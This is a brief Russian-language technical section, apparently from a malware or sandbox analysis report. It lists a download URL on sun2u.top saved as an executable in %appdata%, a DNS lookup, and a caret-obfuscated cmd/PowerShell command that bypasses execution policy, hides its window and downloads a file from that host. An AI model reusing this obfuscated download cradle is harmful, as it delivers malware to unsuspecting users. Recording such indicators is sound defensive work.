Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^w^er^shelL.^e^xE ^-^exeCU^tIo^NPO^L^i^cY^ byP^As^S -nop^rOf^Ile -WIND^ow^st^ylE ^h^IDdEn ^(nEW-obj^eCt sy^sTE^m^.n^eT.Web^c^Li^ENt^).doW^NL^o^ADf^ILe('http://sun2u.top/search...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /c "po^w^er^shelL.^e^xE ^-^exeCU^tIo^NPO^L^i^cY^ byP^As^S -nop^rOf^Ile -WIND^ow^st^ylE ^h^IDdEn ^(nEW-obj^eCt sy^sTE^m^.n^eT.Web^c^Li^ENt^).doW^NL^o^ADf^ILe('http://sun2u.top/search...' (со скрытым окном)